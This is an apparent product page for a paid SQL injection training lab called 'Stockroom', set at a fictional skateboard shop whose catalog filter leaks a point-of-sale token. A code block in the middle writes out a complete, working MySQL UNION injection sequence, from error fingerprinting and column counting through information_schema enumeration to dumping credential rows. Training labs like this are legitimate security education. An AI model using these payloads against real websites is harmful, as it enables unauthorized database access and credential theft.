WEBVERSE


Difficulty: medium · Category: SQL Injection · Tier: Pro

Stockroom

Coast & Decks built their catalog filter in 2011 and never revisited it. The point-of-sale credentials sit in the same database.

The Scenario

Coast & Decks opened in Long Beach in 2011 with the shop website built by a friend of the owner's brother — a weekend job to get the deck catalog online before that season's first big restock. The catalog filter was wired up that same weekend. The point-of-sale integration needed somewhere to keep its rotating credentials; "the database" was the only database the team owned, so that's where they went, alongside the boards and the trucks and the wax.

Challenge Intel

Synopsis

Coast & Decks' shape filter splices its URL parameter straight into the SQL string. Use MySQL information_schema to enumerate tables and columns, then pivot a UNION to read a vault_codes row containing the point-of-sale API token.

What It Is

Coast & Decks runs a small online skateboard catalog. The /decks endpoint filters by board shape via a URL parameter; the parameter is spliced directly into an 8-column SELECT. The vault_codes table — used by the point-of-sale system to store rotating credentials — sits in the same database. The teaching focus here is the MySQL information_schema enumeration sequence: list tables with information_schema.tables, list columns with information_schema.columns, then pivot the UNION to extract from the target table.

Who It's For

Players who know the UNION pattern and need practice with MySQL information_schema enumeration (as opposed to SQLite's sqlite_master).

Skills You'll Practice

  • Identifying MySQL backend via error syntax
  • ORDER BY column-count probing
  • information_schema.tables enumeration (WHERE table_schema=DATABASE())
  • information_schema.columns enumeration
  • Cross-table UNION extraction
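The enumeration sequence from the skills list above, written out as the payloads that would go into the shape parameter. This is an added example, not the challenge's own code: the parameter name `shape`, the single-quoted string context, and the vault_codes column names `name` and `value` are assumptions; the real column names are whatever the information_schema.columns step returns.

```sql
-- Added example, not part of the challenge. Assumptions: the /decks
-- parameter is named `shape`, the original query compares it as a string
-- literal (... WHERE shape = '<value>'), and vault_codes has columns
-- `name` and `value` (hypothetical; step 4 reveals the real ones).
-- Each statement fragment below is the raw value of the shape parameter.
-- `-- -` comments out the rest of the original query; MySQL requires
-- whitespace after `--`, which the trailing `-` guarantees survives
-- URL trimming.

-- Step 0: fingerprint the backend. A lone quote breaks the string
-- literal and MySQL answers with its distinctive error text:
--   "You have an error in your SQL syntax; check the manual that
--    corresponds to your MySQL server version for the right syntax..."
-- shape='

-- Step 1: probe the column count. ORDER BY 8 renders normally,
-- ORDER BY 9 fails with "Unknown column '9' in 'order clause'",
-- so the SELECT has exactly 8 columns.
' ORDER BY 8-- -
' ORDER BY 9-- -

-- Step 2: find which of the 8 positions are rendered in the page.
-- Whichever digits appear in the response are the usable output slots;
-- position 2 is assumed to be one of them from here on.
' UNION SELECT 1,2,3,4,5,6,7,8-- -

-- Step 3: list tables in the application's own schema.
-- information_schema.tables also contains mysql, sys and
-- performance_schema tables; filtering on DATABASE() restricts the
-- listing to the schema the app is connected to.
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6,7,8
    FROM information_schema.tables
    WHERE table_schema=DATABASE()-- -

-- Step 4: list the columns of the target table.
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4,5,6,7,8
    FROM information_schema.columns
    WHERE table_schema=DATABASE() AND table_name='vault_codes'-- -

-- Step 5: pivot the UNION onto vault_codes and pull every row through
-- the single reflected slot (column names assumed, see above).
' UNION SELECT 1,GROUP_CONCAT(CONCAT(name,':',value) SEPARATOR '|'),3,4,5,6,7,8
    FROM vault_codes-- -
```

GROUP_CONCAT is bounded by the session's group_concat_max_len (1024 bytes by default), so if a listing looks suspiciously short, page through it instead with `LIMIT 1 OFFSET n` and a plain `table_name` / `column_name` selector, one row per request.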

What You'll Gain

  • MySQL metadata-enumeration muscle memory
  • Comfort with the table→column→data progression

Ready to hack Stockroom?

Upgrade to Pro to unlock this challenge and the full library.

Stockroom — WebVerse Pro SQL Injection